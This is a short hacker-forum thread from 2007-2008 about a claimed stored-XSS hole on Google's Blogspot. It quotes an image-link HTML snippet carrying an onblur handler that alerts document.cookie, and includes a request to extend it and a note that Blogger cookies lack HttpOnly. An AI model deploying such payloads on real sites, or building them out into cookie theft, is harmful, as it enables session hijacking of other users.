Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Google Blogspot XSS Vulnerability
Posted by: sn
Date: August 22, 2007 09:52AM

Hi fellas,

I have been researching various vulnerability on blogspot.com (an google entity) from couple of days and found something interesting in Google blogspot through which cookie stealing is possible. here is my code correct me if i'm wrong.

code is working on my blogspot account for testing.

<a onblur="javascript:alert(document.cookie)" href="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s1600-h/5af1scd.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s200/5af1scd.jpg" alt="" id="BLOGGER_PHOTO_ID_5101217197124729042" border="0" /></a>



I get the cookie using above code. please comment on my code.

Options: ReplyQuote
Re: Google Blogspot XSS Vulnerability
Posted by: FiSh
Date: August 22, 2007 12:09PM

What's the point of all the styling on it? Changing the cursor? :/

Options: ReplyQuote
Re: Google Blogspot XSS Vulnerability
Posted by: sn
Date: August 22, 2007 12:36PM

@Fish

Actually i was trying upload my pic on my blog so thought to play with it. thats the HTML code blogspot generate automatically. so i put my code in
onblur="javascript:alert(document.cookie)" to get cookie info. It gives me cookies back too.

I'm looking for some good insight to extend it.

Sn

Options: ReplyQuote
Re: Google Blogspot XSS Vulnerability
Posted by: hackathology
Date: November 25, 2007 09:15AM

Nice one

http://hackathology.blogspot.com

Options: ReplyQuote
Re: Google Blogspot XSS Vulnerability
Posted by: Om
Date: May 01, 2008 02:53AM

My tryst with destiny http://sla.ckers.org/forum/read.php?2,20088,20088 :P

BTW, are you sure you are getting cookie? I tried testing but blogger doesn't vomit any cookie values. Just a blank alert box. :|
Link: http://icanhazxss.blogspot.com/
Additionally, Blogger doesn't seem to be using HttpOnly cookie.

---
I'd love to change the world,
but they won't gimme the source code.
Code in my Bug!

Options: ReplyQuote


Sorry, only registered users may post in this forum.